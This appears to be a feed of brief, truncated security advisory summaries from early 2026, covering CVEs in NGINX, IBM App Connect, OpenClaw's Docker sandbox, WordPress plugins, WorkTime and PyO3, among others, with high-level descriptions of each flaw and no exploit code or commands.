ROS-20260224-73-0003

A vulnerability in the ngxmailsmtp response header handler of NGINX Plus and NGINX Open Source web servers is related to a violation of the initial buffer boundary. Exploitation of the vulnerability could allow an attacker acting remotely to gain read access to the data...

CVE-2026-22568

CVE-2026-22568 affects the ZIA Admin UI. An authenticated administrator could potentially retrieve unauthorized internal information due to improper neutralization of certain input in rare conditions. The CVSS 3.1 base score is 5.5 (Medium) with Privileges Required: High, User Interaction: None, ...

Security Bulletin: IBM App Connect Enterprise is vulnerable to multiple vulnerabilities due to IBM Semeru Runtime (CVE-2026-21945,CVE-2026-21932,CVE-2026-21933, CVE-2026-21925 & CVE-2026-1188))

Summary IBM App Connect Enterprise is vulnerable to multiple vulnerabilities due to IBM Semeru Runtime. Vulnerability Details CVEID:CVE-2026-21945 DESCRIPTION: Java SE is vulnerable to a denial of service, caused by an easily exploitable vulnerability issue that allows an remote attacker to cause...

CVE-2019-25462 Web Ofisi Rent a Car v3 SQL Injection via klima Parameter

Web Ofisi Rent a Car v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'klima' parameter. Attackers can send GET requests to with malicious 'klima' values to extract sensitive database information or...

CVE-2019-25442 Web Wiz Forums 12.01 SQL Injection via PF Parameter

Web Wiz Forums 12.01 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the PF parameter. Attackers can send GET requests to memberprofile.asp with malicious PF values to extract sensitive database information...

OpenClaw 安全漏洞

OpenClaw is openclaw open source an intelligent artificial assistant. OpenClaw suffers from a security vulnerability that stems from a Docker tool sandbox configuration injection issue that can be exploited by an attacker to cause container escape or host data access...

ROS-20260220-73-0015

A vulnerability in the net/sched/schhfsc.c component of the Linux operating system kernel is related to incomplete clearing of temporary or auxiliary resources. Exploitation of the vulnerability could allow an attacker to gain access to sensitive data, compromise its integrity, and cause denial o...

CVE-2026-27002

OpenClaw is a personal AI assistant. Prior to version 2026.2.15, a configuration injection issue in the Docker tool sandbox could allow dangerous Docker options bind mounts, host networking, unconfined profiles to be applied, enabling container escape or host data access. OpenClaw 2026.2.15 block...

CVE-2026-27002 OpenClaw: Docker container escape via unvalidated bind mount config injection

OpenClaw is a personal AI assistant. Prior to version 2026.2.15, a configuration injection issue in the Docker tool sandbox could allow dangerous Docker options bind mounts, host networking, unconfined profiles to be applied, enabling container escape or host data access. OpenClaw 2026.2.15 block...

How Security Tool Misuse Is Reshaping Cloud Compromise

Key Takeaways Legitimate secret-scanning tools such as TruffleHog have been operationalized in real-world cloud attack campaigns. Attack progression commonly follows a repeatable sequence: credential discovery, live validation, permission enumeration, and data access. Exposed long-lived access ke...

CVE-2025-15560

An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server "widget" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can...

CVE-2025-12107

Due to the use of a vulnerable third-party Velocity template engine, a malicious actor with admin privilege may inject and execute arbitrary template syntax within server-side templates. Successful exploitation of this vulnerability could allow a malicious actor with admin privilege to inject and...

CVE-2026-23595

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to gain administrative access, modify system...

SQL-injection-explained

SQL-injection-explained Todays topic: SQL Injections Here is y...

WordPress plugin Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application that can be install...

VulnCheck KEV: CVE-2025-12845

The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to unauthorized access of data that leads to privilege escalation due to a missing capability check on the gettabledata function in versions 0.5.4 to 1.2.1. This makes it possible...

PT-2026-20799

An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server "widget" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can...

PT-2026-20798

An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the “guid” parameter. This allows an attacker to execute arbitrary commands on t...

PT-2026-20796

Name of the Vulnerable Software and Affected Versions versions prior to Feb. 19, 2026 Description The software uses a vulnerable third-party Velocity template engine, allowing a malicious actor with admin privilege to inject and execute arbitrary template syntax within server-side templates...

RUSTSEC-2026-0013 Type confusion when accessing data from sublasses of subclasses of native types with `abi3` feature targeting Python 3.12 and up

PyO3 0.28.1 added support for pyclassextends=PyList struct NativeSub and other native types when targeting Python 3.12 and up with the abi3 feature. It was discovered that subclasses of such classes would use the type of the subclass when attempting to access to data of NativeSub contained within...